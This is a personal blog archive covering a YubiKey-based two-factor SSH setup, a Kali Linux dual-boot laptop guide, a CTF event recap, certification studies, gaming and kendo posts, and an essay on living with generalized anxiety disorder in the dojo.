INSERT INTO yubikeys VALUES (3811938, “vvtblilljglk”, “”, "783c8d1f1bb5",
"ca21772e39dbecbc2e103fb7a41ee50f", "00000000", "", 1, 1);
COMMIT;

The fields used above are as follows: `serialnr`, `publicname`, `created`, `internalname`, `aeskey`, `lockcode`, `creator`, `active`, `hardware`. The bold fields were pulled from the Personalization Tool, while the other fields were left default or filled with dummy data. (Yes, don’t worry, all of this is NOT my actual security info)

 

Further testing, does the Yubikey work?

Now that both ykval and ykksm are working and now that we’ve registered a key, let’s see if it works! I’ve run the following commands, all of which indicate that my key does in fact work. As before, the OTP was generated by pressing the YK’s sensor.

$ wget -q -O - ‘http://localhost/wsapi/decrypt?otp=vvtblilljglkkgccvhnrvtvghjvrtdnlbrugrrihhuje'
OK counter=0001 low=75e6 high=fa use=03

 

$ ykclient —url “http://127.0.0.1/wsapi/2.0/verify" --apikey 6YphetClMU1mKme5FrblQWrFt8c=
     4 vvtblilljglktnvgevbtttevrvnutfejetvdvhrueegc --debug
Input:
validation URL: http://127.0.0.1/wsapi/2.0/verify
client id: 4
token: vvtblilljglktnvgevbtttevrvnutfejetvdvhrueegc
api key: 6YphetClMU1mKme5FrblQWrFt8c=
Verification output (0): Success

 

Making OpenSSH use Yubikey authentication

As I’ve mentioned before, for now I’m opting to use the Yubikey device in a very simple manner: as a second authenticator factor (MFA) for my SSH logins. We will setup PAM and OpenSSH in such a way that any SSH login will first prompt for a Yubikey OTP, after which it will ask for the actual user’s password.

Create /etc/yubikey. This file maps usernames to Yubikey public names, using the following format:

thomas:vvtblilljglk          # :

The great news is that Michal Ludvig has proven that you may also store this information inside LDAP, which means one less file to manage on all your client systems!

Edit /etc/pam.d/sshd and change the AUTH section to include the Yubico PAM module, as follows. Substitute   for the fully qualified hostname assigned to the ykval web server.

auth       required    pam_sepermit.so
auth       required   pam_yubico.so mode=client authfile=/etc/yubikey id=5 key=b82PeHfKWVWQxYwpEwHHOmNTO6E= url=http:///wsapi/2.0/verify?id=%d&otp=%s
auth       include      password-auth

Finally edit /etc/ssh/sshd_config and change the following values:

PasswordAuthentication no
ChallengeResponseAuthentication yes

Restart the SSHD and you should be golden!

 

Troubleshooting

When it comes to either ykksm or ykval full logging is available through Apache. If you’ve opted to use the default log locations as outlined in the respective installation guides, then you will find the following files:

[root@master apache]# ls -al /var/log/apache
-rw-r--r--   1 root root 15479 Nov 13 21:53 ykval-access.log
-rw-r--r--   1 root root 36567 Nov 13 21:53 ykval-error.log

These will contain most of the useful messages, should either VAL or KSM misbehave.

 

Video: registering a new key and using it

 

 

Sources:

Aside from all the pages I’ve linked to so far, a few other sites stand out as having been tremendously helpful in my quest to get all of this working correctly. Many thanks go out to:


kilala.nl tags: , , ,

View or add comments (curr. 2)

A cheap laptop as pen-testing portable: Lenovo Ideapad s21e-20 and Kali

2015-10-07 15:00:00

the Lenovo Ideapad s21e-20 Windows 8

In preparation of the recent PvIB penetration testing workshop, I was looking for a safe way to participate in the CTF. I was loathe of wiping my sole computer, my Macbook Air and I also didn't want to use my old Macbook which is now in use as my daughter's plaything. Luckily my IT Gilde buddy Mark Janssen had a great suggestion: the Lenovo Ideapad s21e-20.

Tweakers.net gave it a basic 6,0 out of 10 and I'd agree: it's a very basic laptop at a very affordable price. At €180 it gives me a wonderfully portable system (light and good formfactor), with a decent 11.6" screen, an okay keyboard and too little storage. Storage is the biggest issue for the purposes I had in mind! Biggest annoyance is that the touchpad doesn't work under Linux without lots of fidgetting.

I wanted to retain the original Windows 8 installation on the system, while allowing it to dual-boot Kali Linux. In order to get it completely up and running, here's the process I followed. You will need a bunch of extra hardware to get it all up and running.

So here we go!

  1. Unbox and install as usual. Walk through the complete Windows setup.
  2. Feel free to plug the SDHC microSD card into the storage slot of the laptop. You won't be using it for now, but that way you won't lose it. 
  3. Under Windows Update, disable the optional update for the Windows 10 installer. You don't have enough space for Windows 10 anyway. Then run all required updates, to keep things safe.
  4. Configure Windows as desired :)
  5. Using the partitioning and formatting tool of Windows, cut your C: drive by 1.5GB. Create a new partition on the free space created thusly. 
  6. Download the Kali Linux 32-bit live CD.
  7. Get a tool like Rufus and burn the Kali ISO to the external USB drive.
  8. Restart into UEFI, by using the advanced options menu of the Windows restart. Windows key -> Power icon -> shift-click "restart" -> advanced -> UEFI.
  9. In UEFI go to the "boot" tab. Set the boot mode to "Legacy Support", boot priority to "Legacy first" and USB boot to "enabled". 
  10. Save, then plugin the Wifi dongle on the other USB port and reboot. Boot Kali from the USB drive. 
  11. Once you've booted to the desktop, you're stuck without a mouse :p Press the Windows Flag key on your keybard to popup the search bar. Type "install" and start the Kali installer. 
  12. The installer starts in a new window, but it will only be partially visible! You'll need to navigate using the arrow keys and you'll need to make a few good guesses. For most questions you can use the default value as provided, or confirm the required information using the Enter key.
  13. If you would like to change your Location, the bottom-most option in the list is "Other" which will allow you to select "Europe" and so on.
  14. Once you reach the "Partition disks" screen, choose "Manual".
  15. Your internal storage is /dev/mmcblk0, while the SDHC card in the slot will be /dev/mmcblk1. Ensure that the 1.5GB partition on blk0 is made into /boot as ext4. Also partition the SDHC card to have at least 20GB of / as ext4 and swap (4GB). If desired you may also create a third partition as FAT32, so you can have more scratch space to exchange files between Windows and Linux. 
  16. The bottom-most option in the partitioning screen is "save and continue". Do not mess with TAB etc. Once you're done with the partition tables, just push the down arrow until it keeps beeping and press Enter.
  17. Once asked where to install GRUB, just chuck it on the /dev/mmcblk0 MBR. This kills the Windows 8 default bootloader, but Windows will work just fine. 
  18. Finish the installation by answering the rest of the questions.
  19. Shutdown the laptop, unplug the USB drive and replace it with your USB mouse. Poweron the laptop and boot Kali.

The good thing is that you won't need to mess around with extra settings to actually boot from the SDHC card! On older Ideapad laptops this was a lot of hassle and required extra work to boot from SD

Now, we're almost there!

  1. Follow these instructions to allow GRUB to boot Windows again. At the end use the update-grub command instead of grub2-mkconfig. Use fdisk -l /dev/mmcblk0 to find which partition you need to at to 15_Windows. In my case it was hd0,1. That's the EFI partition. You can reboot to verify that Windows boots again. It will complain that "no operating system was found", but Windows will boot just fine!
  2. The guys at blackMORE Ops have created a nice article titled "20 Things to do after installing Kali Linux". A lot of these additions are very nice, feel free to follow them. 
  3. Follow the Debian Wiki instructions on setting up the WL drivers for the BCM43142 onboard wifi card. Reboot afterwards and unplug the USB wifi dongle before starting back into Linux. Your onboard wifi will now work!
  4. If, like me, you appreciate your night vision go ahead and install F.Lux for Linux. In my case I start it up with: xflux -l 52.4 -g 5.3 -k 2600. You can put that in a small script and include it with the startup scripts of Gnome.  

And there we have it! Your Ideadpad s21e is now dual-booting Windows 8 and Kali Linux. Don't forget to clone the drives to a backup drive, so you won't have to redo all of these steps every time you visit a hacking event :) Just clone the backup back onto the system afterwards, to wipe your whole system (sans UEFI and USB controllers). 


kilala.nl tags: , , , ,

View or add comments (curr. 0)

PvIB Pen.Testing workshop

2015-10-07 06:32:00

The CTF site

Last night I attended PvIB's annual pen-testing event with a number of friends and colleagues. First impressions? It's time for me to enroll as member of PvIB because their work is well worth it!

In preparation to the event I prepared a minimalistic notebook computer with a Windows 8 and Kali Linux dual-boot. Why Kali? Because it's a light-weight and cross-hardware Linux installer that's chock-full of security tools! Just about anything I might need was pre-installed and anything else was an apt-get away. 

Traveling to the event I expected to do some networking, meeting a lot of new people by doing the rounds a bit while trying to pick up tidbits from the table coaches going around the room. Instead, I found myself engrossed in a wonderfully prepared CTF competition. In this case, we weren't running around the conference hall, trying to capture each other's flags :D The screenshot above shows how things worked:

  1. Each participant would register an account on fragzone.nl
  2. Your personal dashboard showed the available challenges, each worth a number of points.
  3. Supposedly easy challenges would net you 50-100 points, while big ones would net 250, 500 or even 1000!
  4. Each challenge would result in a file or piece of text, which one needed to MD5 and then submit through the dashboard.

I had no illusions of my skillset, so I went into the evening to have fun, to learn and to meet new folks. I completely forgot to network, so instead I hung out with a great group of students from HS Leiden, all of whom ended up really high in the rankings. While I was poking around 50-200 point challenges, they were diving deeply into virtual machine images searching for hidden rootkits and other such hardcore stuff. It was great listening to their banter and their back-and-forth with the table coach, trying to figure out what the heck they were up to :)

I ended up in 49th place out of 85 participants with 625 points. That's mostly middle of the pack, while the top 16 scored over 1400 (#1 took 3100!!) and the top 32 scoring over 875. 

Challenges that I managed to tackle included:

Together with Cynthia from HSL, we also tried to figure out:

The latter was a wonderful test and we almost had it! Using various clues from the web, which involved multiple steganography tools provided by Alan Eliason, ImageMagick and VLC. We assumed it was a motion-jpeg image with differences in the three frames detected, but that wasn't it. Turns out it -was- in fact steganography using steghide.

Ironically the very first test proved very annoying to me, as the MD5 sum of the string I found kept being rejected. It wasn't until our coach hinted at ending NULL characters that I switched from "cat $FILE | md5sum" to "echo -n $STRING | md5sum". And that's what made it work. 

To sum things up: was I doing any pen-testing? No. Did I learn new things? Absolutely! Did I have a lot of fun? Damn right! :)


kilala.nl tags: , , , ,

View or add comments (curr. 0)

My first foray into pen-testing

2015-09-30 18:23:00

A few days ago, my buddies at IT Gilde were issued a challenge by the PvIB (Platform voor Informatie Beveiliging), a dutch platform for IT security professionals. On October 6th, PvIB is holding their annual pen-testing event and they asked us to join in the fun. I've never partaken in anything of the sorts and feel that, as long as I keep calling myself "Unix and Security consultant", I really ought to at least get introduced to the basics of the subject :)

So here we go! I'm very much looking forward to an evening full of challenges! 

The PvIB folks warn to not have any sensitive or personal materials on the equipment you'll use during the event, so I went with Mark Janssen's recommendation and bought a cheap Lenovo S21e-20 notebook. I'll probably upgrade that thing to Windows 10 and load it up with a wad of useful tools :)


kilala.nl tags: , , ,

View or add comments (curr. 0)

Some hard work that I need to pull through!

2015-09-30 17:51:00

Aside from my day to day activities in the fields of Unix/Linux and security, I want to ensure that I keep up with relevant and useful skills. I believe that expanding my horizons and keeping up with tech outside of my usual activities is a very useful activity. As the proverbial "big stick" I challenged myself to achieve two professional certifications this year:

  1. Oracle Certified Associate, for Oracle 11. Many of my activities so far have touched on databases, but my current project's the first time that I've had to actually dive into them. I would like to actually know something about the stuff I'm working with, hence I'd like to achieve at least a basic set of Oracle DBA skills. 
  2. Puppet Professional. Puppet's one of the more recent techs that I feel has a huge future. As the saying goes "I want me some of that!". While I have no current need for Puppet, I am keen to soon get started on a Puppet job!

Of course, the year isn't very long anymore, so I'd better get cracking!


kilala.nl tags: ,

View or add comments (curr. 0)

Inadvertent guild master (Wakfu)

2015-07-24 07:55:29

The Damn Snoofles guild

Explanation: this post is about the MMORPG "Wakfu", which Marli and myself played pretty hardcore for about a year in 2013/2014. This post was made on the Wakfu forums before being posted here.

A year onward, I find myself in the surprising position of acting guild master. The prolonged absence of our founding players and Ankama's automatic transfer system led to this new situation. 

Snoofles are NOT an active guild anymore (and whenever Shaleigh finds the time, he can remove the "recruiting" from this topic's title). Rosa and myself will maintain our Haven World as a testament to our group's glory days. 2013 and 2014 were a wonderful time, but they won't return. 

Rosa and I came in at the high point of the guild and met lots of lovely people. I fondly think back to running dungeons and endlessly sh*t-talking with Ama, Disc and Seniv. I remember Bloody and his army of alts, taking us on Luna runs, to grind levels. I remember the rush by the high-ranking players to gather mats and Kama to build up our HW to its current form. And I also remember the drama that finally broke up the team, the ousting of a few members that led to a split in leadership and the heartache that followed. 

That is why we'll be conservators: Damn Snoofles was our home for a year and we loved playing with all of you.


kilala.nl tags: ,

View or add comments (curr. 0)

Puppet Practitioner course completed

2015-06-24 20:03:00

The past few months I've been hearing more and more about Puppet, software that allows for "easy" centralized configuration management for your servers. Monday through Wednesday were spent getting familiar with the basics of the Puppet infrastructure and of how to manage basic configuration settings of your servers. It was an exhausting three days and I've learned a lot!

The course materials assumed that one would make use of the teacher's Puppet master server, while having a practice VM on their own laptop (or on the lab's PC). As I'm usually pretty "balls to the wall" about my studying, I decided that wasn't enough for me :p

Over the course of these three days I've set up a test environment using multiple VMs on my Macbook, running my own Puppet master server, two Linux client systems and a Windows 8 client system. The Windows system provided the most challenges to me as I'm not intimately familiar with the Windows OS. Still, I managed to make all of the exercises work on all three client systems! 

Many thanks to the wonderful Ger Apeldoorn for three awesome days of learning!


kilala.nl tags: , , ,

View or add comments (curr. 0)

First attempt at SQL exam: did not pass

2015-06-19 07:59:00

After roughly three months of studying (at night and on the train) I took a gamble: last night I took my Oracle SQL exam 1Z0-051. Along the way I've learned two things:

  1. The contents of the exam are rather different (and more difficult!) from the practice exams and study materials that came with the two books I have.
  2. It's not a good idea to attempt the online exam at 23:00, after a long day of work and an evening of studying :D

I'm going to "deflate" for a few weeks before continuing my studies. I really, really want to achieve my OCA before the end of the year, so I'd better get a hurry on after that.

But first, my first three days of Puppet training! More exciting new things to learn!


kilala.nl tags: ,

View or add comments (curr. 0)

Branching out, learning about databases

2015-03-01 13:52:00

Since achieving my RHCE last November I've taken things easy: for three months I've done nothing but relaxing and gaming to wind down from the big effort. But now it's time to pick up the slack again!

Over the past years I've worked with many Unix systems and I've also worked with with monitoring, deployment and security systems. However, I've never done any work with databases! And that's changed now that I'm in a scrum team that manages an application which runs on Websphere and Oracle. So here I go! I really want to know what I'm working with, instead of just picking up some random terms left and right. 

Starting per March, I'm studying Oracle 11. And to keep myself motivated I've set myself the goal of achieving basic Oracle certification, which in this case comes in the shape of the OCA (Oracle Certified Associate). The certification consists of two exams: a database technology part and an SQL part, the latter of which may be taken online.

This is going to be very challenging for me, as I've never been a good programmer. Learning SQL well enough to write the small programs associated with the exam is going to be exciting but hard :)


kilala.nl tags: ,

View or add comments (curr. 0)

Passed my RHCE

2014-11-11 09:16:00

Snoopy is happy

Huzzah! I passed, with a score of 260 out of 300... That makes it roughly 87%, which is an excellent ending to four months of hard prepwork.

The great thing is that I'm now able to rack up 85 CPE for my CISSP! 25 points in domain A and 60 points in domain B, which means that my CISSP renewal for this year and the next two is a basic shoe-in. Of course, I'll continue my training and studies :)

My RHCE experience was wonderful. Like last year with my RHCSA, I took the Red Hat Kiosk exam in Utrecht.

A while back I was contacted by Red Hat, to inform me I'm a member Red Hat 100 Kiosk Club which basically means that I'm one of the first hundred people in Europe to have taken a Kiosk exam. As thanks for this, they offered me my next Kiosk exam for free, which was yesterday's RHCE. Nice!

The exam was slated for 10:00, I showed up at 09:30. The reception at BCN in Utrecht was friendly, with free drinks and comfy seats to wait. The Kiosk setup was exactly as before, save the slot for my ID card which was already checked at the door. The keyboard provided was pretty loud, so I'm sorry to the other folks taking their exams in the room :)

All in all I came well prepared, also with thanks to my colleagues for sharing another trial exam with me.


kilala.nl tags: , ,

View or add comments (curr. 0)

Let's do this!

2014-11-09 15:15:00

RHCE exam in 18 hours

If I'm not ready by now, nothing much will help :)

Looking forward to taking the RHCE exam tomorrow and whichever way it goes, I'm also looking forward to the SELinux course I'll be taking at IT Gilde tomorrow night. 


kilala.nl tags: , ,

View or add comments (curr. 0)

RHCE exams, here I come

2014-07-29 21:32:00

Yes, this blog has been quiet for quite a while. In part this is because I've put most of my private stuff behind logins, but also because I've had my professional development on a backburner due to my book translation. 

But now I've started studying for my RHCE certification. A year ago (has it been that long?!) I achieved my RHCSA, which I'll now follow up with the Engineer's degree. Red Hat will still offer the RHEL6 exams until the 19th of december, so I'd better get my ass in gear :)


kilala.nl tags: , ,

View or add comments (curr. 0)

F.Lux on Linux: oh happy day!

2014-07-29 21:27:00

Oh happy day! I've been using F.Lux on my Macs for years now and my eyes thank me for it. This great piece of software will automatically adjust the color temperature of your computer's screen, based on your location and light in your surroundings. 

During the day your screen's white will be white, but in the evenings it'll slowly turn much more orange. During this change you won't even notice it's happening, but the end result is awesome. You'll still be seeing "white" but with much less eyestrain. Even better: supposedly the smaller amount of blue light will help in falling asleep later on. 

Now that I've started studying for my RHCE exams, I'm working extensively on CentOS again. Hellooooo bright light! 

But not anymore. Turns out that xflux is a thing! It's a Linux daemon that quite literally is F.Lux, for Linux. No more burnt out corneas! 


kilala.nl tags: , ,

View or add comments (curr. 0)

Dutch kendo kata book (Nederlandstalig kendo kata boek)

2014-05-21 14:53:00

Historically, the western kendoka has had a tough time finding books and materials to study in his native language. It is only natural that most texts on the subject of kendo and kendo kata are published in the Japanese language.

The Netherlands and Belgium could be considered a very small market for kendo-related books. Thus, the only kendo books in the dutch language that I am aware of are Louis Vitalis-sensei‘s book and the translation of Jeff Broderick’s book.

 

A dutch kendo kata book

It is with great pleasure that we announce the publication of a brand new, dutch kendo book.

Nihon Kendo no Kata & Kihon Bokuto Waza” is a translation of Stephen Quinlan-sensei‘s essay on both the traditional kendo kata and on the modern set of waza practices with bokuto. Thomas Sluyter translated the book into the dutch language, in cooperation with Quinlan-sensei.

 

 

 

Availability

The book is available both in print and as a free ebook.

The original, english version can be obtained here.

 

Contents

The following subjects are covered:

 

About the book

As teachers at the Kingston Kendo Club in Canada, Stephen and Christina Quinlan have written many study materials for their students. One of their largest bodies of work is this particular book, “Nihon Kendo no Kata & Kihon Bokuto Waza“. The book combines literal, technical descriptions of each kata with deep backgrounds on the history, and the philosophy behind the kata. Many books by esteemed teachers were referenced to build this comprehensive body of knowledge.

Thomas Sluyter is a relatively new student of kendo at Renshinjuku Kendo in Amstelveen, the Netherlands. As an avid reader of kendo books, he felt that this particular book should be read by as many Dutch kendoka as possible.


kilala.nl tags: ,

View or add comments (curr. 0)

Living with shikai: generalised anxiety disorder in kendo

2014-03-15 22:01:00

To retain heijoshin (an even mind) is one of the greater goals in kendo.

Heijoshin reflects a calm state of mind, despite disturbing changes around you. [It] is the state of mind one has to strive for, in contrast to shikai, or the 4 states of mind to avoid:

  1. Kyo: surprise, wonder
  2. Ku: fear
  3. Gi: doubt
  4. Waku: confusion, perplexity

(Buyens, 2012)

In the following pages I would like to introduce you to generalized anxiety disorder, hereafter “GAD”. For sufferers of GAD every day is filled with two of these shikai: fear and doubt. While I am but a layman I do hope that my personal experiences will be of use to those dealing with anxiety disorders in the dojo. I will start off by explaining the medical background of GAD, followed by my personal experiences. I will finish the article by providing suggestions to students and teachers dealing with anxiety in the dojo.

 

Anxiety disorders: definition and treatment

All of us are familiar with anxiety and fear as they are basic functions of the human body. You are startled by a loud noise, you jump away from a snapping dog and you feel the pressure exuded by your opponent in shiai. They prepare your body for what is called the “fight or flight” reaction: either you run for your life, or you stand your ground and fight tooth and nail. These instincts become problematic if they emerge without any reasonable stimulus. The most famous type of such a disorder are phobias, the fear of specific objects or situations, which are suggested to occur in ~25% of the adult US population. (Rowney, Hermida, Malone, 2012)

Other types of anxiety disorders are:

For the remainder of this article I will focus on the disorder with which I have personal experience: generalized anxiety disorder.

Perhaps the easiest ways to describe GAD is to use an analogy: GAD is to worry, as depression is to “feeling down”. Just like a depressed person cannot “simply get over it” and is debilitated in his daily life, so does a person with GAD live with constant worry. As it was described by comic artist Mike Krahulik:

The medication I picked up today said it could cause dizziness. […] I had to obsess over it all afternoon: I drove to work today by myself, will I be able to drive home? What if I can’t? How will I know if I can’t? Should I call the doctor if I get dizzy? How dizzy is too dizzy? What if the doctor isn’t there? Will I need to go to the hospital? Should I get a ride home? I can’t leave my car here overnight. The garage closes at 6 what will I do with my car? What if Kara can’t come get me? Should I ask Kiko for a ride home? If I get dizzy does that mean it’s working? Does that mean it’s not working? What if it doesn’t work?” (Krahulik, 2008)

Paraphrased from DSM-IV-TR (footnote 1) and from Rowney, Hermida, Malone, criteria for GAD are that the person has trouble controlling worries and is anxious about a variety of events, more than 50% of the time, for a duration of at least 6 months. These worries must not be tied to a specific anxiety or phobia and must not be tied to substance abuse. The person exhibits at least three of the following symptoms: restlessness, exhaustion, difficulty concentrating, irritability, muscle tension and sleep disturbance.

Thus the symptoms differ per person, as does the potency of an episode. In severe cases of GAD episodes will result in what is known as a panic attack, which you could describe as a ten-minute bout of super-fear. Effects of a panic attack may include palpitations, cold sweat, spasms and cramps, dizziness, confusion, aggressiveness and hyperventilation. Because of these effects, people having a panic attack may think they are having a heart attack or that they are going plain crazy.

An important element to GAD is the vicious cycle or snowball effect. As my therapy workbook describes it (Boeijen, 2007), a sense of anxiety will lead to physical and mental expressions, which in turn will lead to anxious thinking. People with GAD will often fear the effects of anxiety, like fainting or throwing up. These anxious thoughts will create new anxiety, which may worsen the experienced effects, which in turn will feed more anxious thoughts. And so on. Thus, even the smallest worry could start an episode of anxiety, like a snowball rolling down a slope. What may get started with “The fish I had for lunch tasted a bit off.” may end up with “Oh no, I’m having a heart attack!“. If that doesn’t sound logical to you, you’re right! The vicious cycle feeds off of assumptions, worries and thoughts that get strung together. I’ll have two personal examples later.

Treatment of GAD occurs in different ways, often combined:

All sources agree that having proper support structures is imperative for those suffering from any anxiety disorder. Knowing that people understand what you are going through provides a base level of confidence, a foothold if you will. Knowing that these people will be able to catch you if you fall is a big comfort. Having someone to help you dispel illogical and runaway worries is invaluable.

 

My personal experiences with GAD

I am lucky that I suffer from mild GAD and that I have only experienced less than fifteen panic attacks in my life. Where others are harrowed by constant anxiety, I only have trouble in certain situations. I was never diagnosed as such, but in retrospect I have had GAD since my early childhood. At the time, the various symptoms were classified as “school sickness”, irritable bowel syndrome and work-related stress. It was only during a holiday abroad in 2010 that I realized something bigger was at hand, because I had a huge panic attack. I was extremely agitated, could not form a coherent strain of thought and was very argumentative. My conclusion at the time was that “I’m going crazy here, that has to be it. I really don’t want this, I need a pill to take this away right now!“. Oddly, I discounted the whole thing when we arrived home. It took a second, big panic attack for me to accept that I needed to talk to a professional.

This second panic attack progressed as follows:

(Sluyter, 2011)

This illustrates the aforementioned vicious cycle: an innocuous thought (“I wonder how my daughter is doing.“) leads to me worrying that I’m ill, which leads to me worrying about my errand, which gives me stomach cramps, which reinforces my fears about being ill, which makes me nauseous and dizzy, and so on. Worries express themselves, which creates anxiety, which in turn reinforces the earlier worries. It didn’t take my doctor long to refer me to a therapist for Cognitive Behavior Therapy, hereafter “CBT”.

CBT is one of many forms of therapy applicable to anxiety disorders and it is often cited as the most effective one. It is suggested (Rowney, Hermida, Malone, 2012) that CBT achieves “a 78% response rate in panic disorder patients who have committed to 12 to 15 weeks of therapy“. In my personal opinion CBT is successful because it is based on empowerment: the patient is educated about his disorder, showing him that it does not have actual power over him and how he can deal with it. As part of therapy, one learns to recognize the patterns that are involved in the disorder and how to pause or halt these cycles. Patients are given tools to prevent episodes, or to relax during an attack. CBT also relies upon the notion of ‘exposure’ wherein the patient is continuously challenged to overstep his own boundaries. The senses of self-worth and of confidence are improved by realizing that your world isn’t as small as you let your fears make it.

I have learned that the best way to deal with a runaway snowball of thoughts is to dispel the thoughts the moment they occur. Anxious thoughts often start out small and then spiral into nonsensical and unreasonable worries. By tackling each question when it comes, I maintain a feeling of control. Having someone with me to talk over all these worries is very useful, because they are an objective party: they can answer my questions from a grounded perspective. My wife has proven to be indispensable, simply by talking me down from the nonsense in my head.

I first started kendo in January of 2011, half a year before I started CBT. In the week leading up to class I devoured online resources, just so I wouldn’t make a fool of myself. In my mind I had this image that I would be under constant scrutiny as ‘the new guy’. I feared that any misstep would make my integration into the group a lot harder. I read up on basic class structures, on etiquette, on basic terminology and I even did my best to learn a few Japanese phrases in order to thank sensei for his hospitality. Even before taking a single class I already had a mental image of kendo as very strict, disciplined and unforgiving and I was making assumptions and having worries left and right.

I have now practiced kendo for little over two years and I have found that it is a great tool in conquering my anxiety disorder.

  1. I experience kendo as a physically tough activity. Seeing myself break through my limitations forces me to reassess what I am and am not capable of.
  2. The discipline in class feels like a solid wall holding me up and there is a sense of camaraderie. My sempai and sensei will not let me fail and I have a responsibility towards them to tough it out.
  3. Reading and learning about kendo provides me with confidence that I may one day grow into a sempai role.
  4. In kendo one aims for kigurai. As Geoff Salmon-sensei once wrote: “kigurai can mean confidence, grace, the ability to dominate your opponent through strength of character. Kigurai can also be seen as fearlessness or a high level of internal energy. What it is not, is posturing, self congratulating or show-boating“. (Salmon, 2009) Thus kigurai is a very empowering concept!
  5. Kendo is such an engaging activity that it grabs my full attention. Once we have started I no longer have time to worry about anything outside of the dojo. Or as one sempai says: “At tournaments I’m panicking all the way to the shiaijo, but once shiai starts I’m in the zone.

In the dojo I may forget about the outside world, but there are many reasons for anxiety in the training hall as well. For example, after a particularly heavy training I will feel nauseous and lightheaded, which has led to fears of fainting and hyperventilation. I have also worried about sensei’s expectations regarding my performance and attendance to tournaments (“What if I can’t attend? What will he say? Will he reproach me? Will he think less of me?“).

I have also felt anxious about training at our dojo’s main hall, simply because their level is so much higher than mine. I felt that I was imposing on them, that I was burdening them with my bad kendo and that I was making a fool of myself. I finally broke through this by exposure: by attending a national level training and sparring with 7-dan teachers I learned that a huge difference in skill levels is nothing to be ashamed of. All of a sudden I felt equal to my sempai, not as a kendoka but as a human being.

Another great example of exposure was a little trick pulled by the sensei of our main dojo who is aware of my GAD. He had noticed that I allow myself to bow out early if I start to get anxious. So what does he do? We started class using mawari geiko (where the whole group rotates to switch partners) and right before it’s my turn to move to the kakarite side he freezes the group’s rotation. So now I’m stuck in a position where I have responsibility towards my sempai, because without me in this spot the opposing kakarite would need to skip a round of practice! On the one hand I was starting to get anxious from physical exhaustion, but on the other hand I would not allow myself to stop because of this sense of responsibility. His trick worked and I pulled through with stronger confidence.

In the dojo I regularly use two of the tools taught to me during CBT (Boeijen, 2007):

 

GAD in the dojo, for teachers

If one of your students approaches you about their anxiety disorder, please take them seriously. As I explained at the beginning of this article we all feel fear and have doubts, but an actual disorder is another kettle of fish. You will not be expected to be their therapist or their caretaker; all they need is your support. Simply knowing that you’ve got their back is a tremendous help to them!

In issue #5.2 of “Kendo World” magazine, Ben Sheppard in his article “Teaching kendo to children” (Sheppard, 2010) discusses the concept of duty of care. While the legal aspects of the article pertain to minors in certain countries, the general concept can be applied to any student who may require special care. It would be prudent to have some file containing relevant medical and emergency information. This should not be a medical file by any means, but having a list of known risks as well as emergency contact information would be a good idea.

Please realize that you are helping your student cope with their anxieties simply by teaching him kendo. Brad Binder offers (Binder, 2007) that most studies agree that the regular participation in a martial art “cultivates decreases in hostility, anger, and feeling vulnerable to attack. They also lead to more easygoing and warmhearted individuals and increases in self-confidence, self-esteem and self-control.” This may in part be due to the fact that “Asian martial arts have traditionally emphasized self-knowledge, self-improvement, and self-control. Unlike Western sports, Asian martial arts usually: teach self-defense, involve philosophical and ethical teachings to be applied to life, have a high degree of ceremony and ritual, emphasize the integration of mind and body, and have a meditative component.

Should a student indicate that they are having a panic attack, take them aside. Remove them from class, but don’t leave them alone. Have them sit down on the floor and against a wall to prevent injuries should they faint. Guide them through a breathing exercise, like described in the previous paragraph. Reassure them that they are safe and that, while it feels scary, they will be just fine. Help them dispel illogical anxious thoughts. Funny kendo stories are always great as backup material.

Finally, I would suggest that you keep on challenging these students. Continued exposure, by drawing them outside of their comfort zone, will hopefully help them extend beyond their limitations. Having responsibilities and being physically exhausted can lead to anxiety in these people, but being exposed to them in a supportive environment can also be therapeutic.

 

GAD in the dojo, for students

If you have GAD, or another anxiety disorder, I think you should first and foremost extend your support structure into the dojo. Inform your sensei of your issues because he has a need to know. As was discussed in an earlier issue (“Kendo World” #5.2, Sheppard, 2010), dojo staff needs to be aware of medical conditions of their students, for the students’ safety. If there’s a chance of you hyperventilating, fainting or having a panic attack during class, they really need to know.

If you are on medication for your anxieties, please also inform your sensei. They don’t necessarily have to know which medication it is, but they need to be made aware of possible side effects. They should also be able to inform emergency personnel if something ever happens to you.

If you feel comfortable enough to do so, confide in at least one sempai about your anxieties. They don’t have to know everything about it, but talking about your thoughts and worries can help you calm down and put things into perspective. They can also take you aside during class if need be, so the rest of class can proceed undisturbed and so you won’t feel like the center of attention.

Being prepared can give you a lot of peace of mind. I bring a first aid kit with me to the dojo that includes a bag to breathe into (for hyperventilation) and some dextrose tablets. I also look up information about the dojo and tournament venues I will be visiting, to know about amenities, locations and such.

If you aren’t already in therapy, I would sincerely suggest CBT. CBT can help you understand your anxiety disorder and it can provide you with numerous tools to cope. Anxiety is not something you’re easily cured of, but by having the right skills under your belt you can definitely make life a lot easier for yourself!

And let me just say: kudos to you! You’ve already faced your anxieties and crossed your own boundaries by joining a kendo dojo! The toughest, loudest and smelliest martial art I know!

 

Footnotes and references

1: DSM-IV-TR is Diagnostic and Statistical Manual of Mental Disorders, 4th edition, text revision. A document published by the American Psychiatric Association that attempts to standardize the documentation and classification of mental disorders.

 

Binder, B (1999,2007) “Psychosocial Benefits of the Martial Arts: Myth or Reality?”

Boeijen, C. van (2007) “Begeleide Zelfhulp – overwinnen van angstklachten”

Budden, P. (2007) “Buteyko and kendo: my personal experience, 2007”

Buyens, G. (2012) “Glossary related to BUDO and KOBUDO”

Krahulik, M. (2008) “Dear Diary”

Rowney, Hermida, Malone (2012) “Anxiety disorders”

Salmon, G. (2009) “Kigurai”

Sheppard, B (2010) “Teaching kendo to children” – Appeared in Kendo World 5.2

Sluyter, T. (2011) “Dissection of a panic attack”

This article appeared before in Kendo World magazine, vol 6-4, 2013 (eBook and print version on Amazon). The article is republished here with permission of the publisher.


kilala.nl tags: , , ,

View or add comments (curr. 0)

Etiquette reminders

2014-03-13 22:00:00

The past few weeks, we have been paying extra attention to kendo etiquette.  As they say: “Rei ni hajimari, rei ni owari” (kendo begins with rei and ends with rei); without etiquette we might as well just whack each other with sticks.

There are many books and articles available on kendo etiquette and one can talk for hours about it. For now, these are some of the things that we have been reminded of recently.


kilala.nl tags: , ,

View or add comments (curr. 0)

Info on the knee injury

2013-10-19 19:37:00

Good news about my sports injury: I went to see a physio therapist and he agrees with the previous assessment that nothing's actually damaged in my knee. The theory remains as before: I twisted my knee "in a bad way" during kendo and something got pinched. That something is probably my meniscus, a cartilege-like layer that's in between the knee joint. 

